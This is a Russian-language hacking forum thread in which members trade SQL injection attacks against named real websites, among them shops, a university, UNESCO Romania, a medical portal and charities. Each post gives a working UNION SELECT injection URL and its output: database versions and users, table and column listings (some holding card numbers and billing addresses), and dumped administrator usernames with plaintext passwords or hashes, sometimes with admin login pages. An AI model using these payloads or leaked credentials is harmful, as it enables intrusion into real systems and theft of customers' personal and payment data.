SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.mysupermarket.ro/produse.php?pID=227+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+limit+1,1

    Database Version: 5.0.27
    Database name: db_mysupermarketro
    User name: mysupermarketro@localhost
    Os: redhat-linux-gnu



    http://www.mysupermarket.ro/produse.php?pID=227+UNION+SELECT+1,2,3,4,(SELECT+CONCAT_ws(0x3a,aUsername,aPassword,aemail)+FROM+db_mysupermarketro.Account+LIMIT+x,1),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+limit+1,1
     
  2. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    ПР4
    http://www.sault.ymca.ca/content.php?ID=-65+union+select+1,2,3,4,5,concat_ws(0x3a3a,admin_user_type,admin_user_workflow,admin_username,admin_password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+Admin_Users+/*+
    1::1::ymca_2008::ymca_fitness
     
  3. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    http://www.sault.ymca.ca/content.php?ID=-65+union+select+1,2,3,4,5,concat_ws(0x3a3a,admin_user_type,admin_user_workflow,admin_username,admin_password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+Admin_Users+/*+
    1::1::ymca_2008::ymca_fitness
     
  4. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    Unesco Romania

    http://www.cnr-unesco.ro/ro/stire.php?id=-121+UNION+SELECT+1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8,9,10,11/*


    Database Version: 4.1.22
    Database name: tibiq_unesco
    User name: tibiq_unesco@localhost
    Os: redhat-linux-gnu
     
  5. RulleR

    RulleR Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    166
    Likes Received:
    439
    Reputations:
    313
    [PR 3]
    Code:
    http://www.timeshare-obmen.ru/bonus.php?id=-3448449+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,version(),database(),user()),11,12,13--
    5.0.26-log:timeshareb:timeshareb@localhost

    [PR 3]
    Code:
    http://www.piyanas.com/bonus.php?id=-1361+union+select+1,2,concat_ws(0x3a,version(),database(),user())--&lang=en
    5.0.51a-community:piyanas_db:piyanas_piyanas@localhost
    Code:
    http://www.piyanas.com/bonus.php?id=-1361+union+select+1,group_concat(table_name),3+from+information_schema.tables--&lang=en
    Code:
    http://www.piyanas.com/bonus.php?id=-1361+union+select+1,group_concat(column_name),3+from+information_schema.columns+where+table_name=0x696c6f5f61646d696e6973747261746f725f75736572--&lang=en
    columns from table ilo_administrator_user
    Code:
    http://www.piyanas.com/bonus.php?id=-1361+union+select+1,concat_ws(0x3a,administrator_id,username,password),3+from+ilo_administrator_user--&lang=en
    administrator_id,username,password
     
  6. _Quest_

    _Quest_ Member

    Joined:
    21 May 2009
    Messages:
    11
    Likes Received:
    12
    Reputations:
    3
    ШОП http://store.yeproc.com

    _http://www.yeproc.com/upload/media/view_media.php?id=-459+union+select+1,2,3,user(),version(),6,7,8,9,10,11,12,13,14,15,16,17--

    Code:
    189 :In database redeyedb found table store_fixes_recreate_orders
      0 :   username
      1 :   full_name
      2 :   email
      3 :   order_number
      4 :   order_date
      5 :   order_date_time
      6 :   order_shipping
      7 :   order_tax
      8 :   order_total
      9 :   card_number
      10 :   product_id
      11 :   item_number
      12 :   product_type
      13 :   description
      14 :   artist_name
      15 :   value_add_flag
      16 :   quantity
      17 :   unit_price
      18 :   line_total
      19 :   bill_name_first
      20 :   bill_name_last
      21 :   bill_address1
      22 :   bill_address2
      23 :   bill_address3
      24 :   bill_city
      25 :   bill_state
      26 :   bill_postal_code
      27 :   bill_country
      28 :   bill_phone
      29 :   ship_name_first
      30 :   ship_name_last
      31 :   ship_address1
      32 :   ship_address2
      33 :   ship_address3
      34 :   ship_city
      35 :   ship_state
      36 :   ship_postal_code
      37 :   ship_country
      38 :   ship_phone
    
    и вторая бд.
    Code:
    214 :In database redeyedb found table store_order
      0 :   id
      1 :   id_store
      2 :   id_store_user
      3 :   session_id
      4 :   order_number
      5 :   order_date
      6 :   subtotal
      7 :   tax
      8 :   shipping
      9 :   total
      10 :   card_type
      11 :   card_number
      12 :   card_expiration
      13 :   card_name
      14 :   bill_name_first
      15 :   bill_name_last
      16 :   bill_address1
      17 :   bill_address2
      18 :   bill_address3
      19 :   bill_city
      20 :   bill_state
      21 :   bill_postal_code
      22 :   bill_country
      23 :   bill_phone
      24 :   ship_name_first
      25 :   ship_name_last
      26 :   ship_address1
      27 :   ship_address2
      28 :   ship_address3
      29 :   ship_city
      30 :   ship_state
      31 :   ship_postal_code
      32 :   ship_country
      33 :   ship_phone
      34 :   facts_export_id
      35 :   digital_export_id
    
     
    #9426 _Quest_, 23 May 2009
    Last edited by a moderator: 23 May 2009
  7. udman

    udman Elder - Старейшина

    Joined:
    21 Apr 2009
    Messages:
    224
    Likes Received:
    105
    Reputations:
    25
    ivan_zona@localhost
    5.0.77-community
    ivan_zona

    Логины пассы юзерей

    u_client_salgir@localhost
    salgir
    4.1.22-log

    Юзеры


    4.1.22-standard
    total_city
    total_city@localhost



    4.1.22-standard
    handy_crimea
    handy_crimea@localhost
     
    #9427 udman, 23 May 2009
    Last edited: 23 May 2009
  8. beerhack

    beerhack Elder - Старейшина

    Joined:
    1 Mar 2008
    Messages:
    99
    Likes Received:
    48
    Reputations:
    5
    PR6
    Code:
    http://www.augustana.edu/academics/music/department/facultyBio.php?ID=-1+union+select+1,2,3,4,concat_ws(0x3a,user,password),6,7,8,9,10,11+from+mysql.user/*
    Database Version: 4.1.22-log
    Database name: music
    User name: [email protected]

    music:244ed17b5aa3b964
     
    1 person likes this.
  9. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    http://www.reformjudaismboston.org/content.php?id=-108'+union+select+1,database(),3,4,5,6,7,8,9,10,11,12+--+
    reformjudaismboston_org_-_invision2
     
  10. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.netmedica.ro/stire.php?id=-63+UNION+SELECT+1,concat_ws(0x3a,version(),database(),useR(),@@version_compile_os),3,4--


    Database Version: 5.0.54-log
    Database name: netmedica
    User name: netmedicasql@localhost
    Os: pc-linux-gnu

    http://www.netmedica.ro/stire.php?id=-63+UNION+SELECT+1,concat_Ws(0x3a,user_name,user_passwd),3,4+FROM+netmedica.users+LIMIT+x,1--

    0]:testuser:a/Uw5jGt4sWxY
    [1]:testadmin:e2d1903c479e40495a09ee7e40e42de8
    [2]:admin:gzAV0iFKm9PbU
    [3]:gabi:3Kbi7htfFdTew
    [4]:dafi:.S9LiwYFcjV2c
    [5]:adm:e2d1903c479e40495a09ee7e40e42de8
    [6]:aqsw12:e2d1903c479e40495a09ee7e40e42de8
     
    1 person likes this.
  11. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    pr6
    http://www.semops.com/content.php?id=-296+union+select+1,2,3,4,5,6,7,database(),9,10+from+users+/*+
    semops
    Колонки не смог подобрать((

    http://www.jimmcleantexas.com/content.php?id=-33+union+select+1,2,username,password,5,6,7,8,9+from+admin+/*+
    admin::21232f297a57a5a743894a0e4a801fc3 - admin
     
    #9431 DezMond™, 23 May 2009
    Last edited: 23 May 2009
  12. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    -------------------------------------------------

    http://www.clubservices.com.mx/prov.php?id=116+union+select+1,2,3,4,5,6,7

    5.0.45:sci@localhost:SCI

    таблицы: http://www.clubservices.com.mx/prov.php?id=-116+union+select+table_name,2,3,4,5,6,7+from+information_schema.tables

    --------------------------------------------------------
    http://www2.hnk.hr/hr/novosti.php?id=385+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database())

    5.0.32-Debian_7etch10-log:hnk@localhost:hnk

    нас интересует:
    http://www2.hnk.hr/hr/novosti.php?id=385+union+select+1,2,3,4,table_name+from+information_schema.tables+limit+34,1/*

    поля:
    user_id
    type
    first_name
    last_name
    email
    login
    password

    Число записей: http://www2.hnk.hr/hr/novosti.php?id=385+union+select+1,2,3,4,count(*)+from+users/*
    одна запись

    http://www2.hnk.hr/hr/novosti.php?id=385+union+select+1,2,3,4,concat_ws(0x3a,login,password)+from+users/*
    zlatko:monografija

    -------------------------------------

    да простит меня Бог. следующий сайт
    http://www.tyri.orthodox.ee/novosti.php?id=51+union+select+1,2,3,4,5,6,7,8

    http://www.tyri.orthodox.ee/novosti.php?id=51+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8
    4.1.20:eek:rthodox@localhost:eek:rthodox

    -------------------------------------
     
  13. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    http://www.auchinachie.com/content.php?id=-8+union+select+1,2,id,4,password,6,7,8,9,10,11,12,13,14,15+from+users+/*+
    0000000247::bluepix05
     
  14. DeepXhadow

    DeepXhadow Elder - Старейшина

    Joined:
    19 Apr 2008
    Messages:
    57
    Likes Received:
    11
    Reputations:
    5
    http://ej.kubagro.ru/a/viewaut.asp?id=11+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13+from+news

    Microsoft JET Database Engine
     
  15. Kimliksiz

    Kimliksiz Member

    Joined:
    7 May 2009
    Messages:
    31
    Likes Received:
    12
    Reputations:
    11


    http://www.fig.gr/index.php?option=com_recipes&Itemid=S@BUN&func=detail&id=-1/**/union/**/select/**/0,1,concat(username,0x3a,password),username,0x3a,5,6,7,8,9,10,11,12,0x3a,0x3a,0x3a,username,username,0x3a,0x3a,0x3a,21,0x3a/**/from/**/mos_users/*

    admin:b86104f63387af1ccb1d049223680a2c
     
  16. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    960
    Likes Received:
    392
    Reputations:
    58
    http://www.amherst250.org {PR 4}
    Code:
    http://www.amherst250.org/index.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11/*
    4.1.20 : amherst250bs : fclerk@localhost

    ------------------------------------------------------------------------------------------------

    http://www.newcastlemusic.com {PR 4}
    Code:
    http://www.newcastlemusic.com/artists.php?ID=-2340+union+select+1,concat_ws(0x3a,version(),database(),user())/*
    4.1.22-log : agoodwi_newcastlemusic : [email protected]
     
    #9436 Skofield, 24 May 2009
    Last edited: 24 May 2009
  17. RulleR

    RulleR Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    166
    Likes Received:
    439
    Reputations:
    313
    [PR 5]
    Code:
    http://www.phoenixfilmfestival.org/pages/contact.php?id=-78+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
    4.1.22-standard:film_cms:film_dba@localhost

    [PR 2]
    Code:
    http://www.commoditymarketing.com/contact.php?id=-2+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6
    5.0.51b-community-nt:cmc:web@localhost

    [PR 0]
    Code:
    http://www.rupasoni.com/temp.php?id=-5+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6
    4.1.22-log:rupasoni:[email protected]

    [PR 0]
    Code:
    http://gayatriweddingservices.com/temp.php?id=-2+union+select+concat_ws(0x3a,version(),database(),user())
    4.1.22-log:gayatriwedding:[email protected]
     
    #9437 RulleR, 24 May 2009
    Last edited by a moderator: 24 May 2009
  18. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    960
    Likes Received:
    392
    Reputations:
    58
    http://nursingphd.org {PR 6}

    users:
    Code:
    http://nursingphd.org/programs/detail.php?id=-6+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,group_concat(username,0x3a,password),24,25,26,27,28+from+users--
    http://nursingphd.org/admin

    ---------------------------------------------------------------------------------------------------------

    http://www.crstodayeurope.com {PR 4}
    Code:
    http://www.crstodayeurope.com/Pages/whichArticle.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8/*
    4.1.22-max-log : CRSTEurope : [email protected]

    ---------------------------------------------------------------------------------------------------------

    http://www.forgottencats.org {PR 4}
    Code:
    http://www.forgottencats.org/fcpage.php?id=-1+union+select+concat_ws(0x3a,version(),database(),user()),2/*
    5.0.32-Debian_7etch10-log : forgottencats : [email protected]

    users:
    Code:
    http://www.forgottencats.org/fcpage.php?id=-1+union+select+group_concat(username,0x3a,password),2+from+users/*
    WebCat:forcatss,AdminCat:224BMP

    http://www.forgottencats.org/login.php
     
    #9438 Skofield, 24 May 2009
    Last edited: 24 May 2009
  19. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    http://www.avantesecurity.com/content.php?id=-83'+union+select+1,2,3,4,concat_ws(0x3a3a,id,username,password,email,firstname,lastname,accesslevel),6,7,8,9,10,11,12,13,14,15,16+from+users+limit+0,1+--+&view=full&nid=12
    2::::a::[email protected]::Wayne::Chan::1
    6::::admin123::[email protected]::Daniel::Raja::1

    http://www.apneesehat.net/content.php?id=-72+union+select+1,2,unhex(hex(concat_ws(0x3a3a,name,password))),4,5,6,7,8+from+admin+--+
    admin::admin
    Админку не нашёл((

    http://www.halal2all.com/Content.php?id=-2+union+select+database(),2,3,4+/*+
    halal_dat
     
    #9439 DezMond™, 24 May 2009
    Last edited: 24 May 2009
  20. F4R

    F4R Banned

    Joined:
    20 Jun 2008
    Messages:
    224
    Likes Received:
    46
    Reputations:
    2
    *


    Database Version: 4.0.26-log
    Database name: udb3689
    User name: Uwww3689S@localhost
     
    1 person likes this.
Thread Status:
Not open for further replies.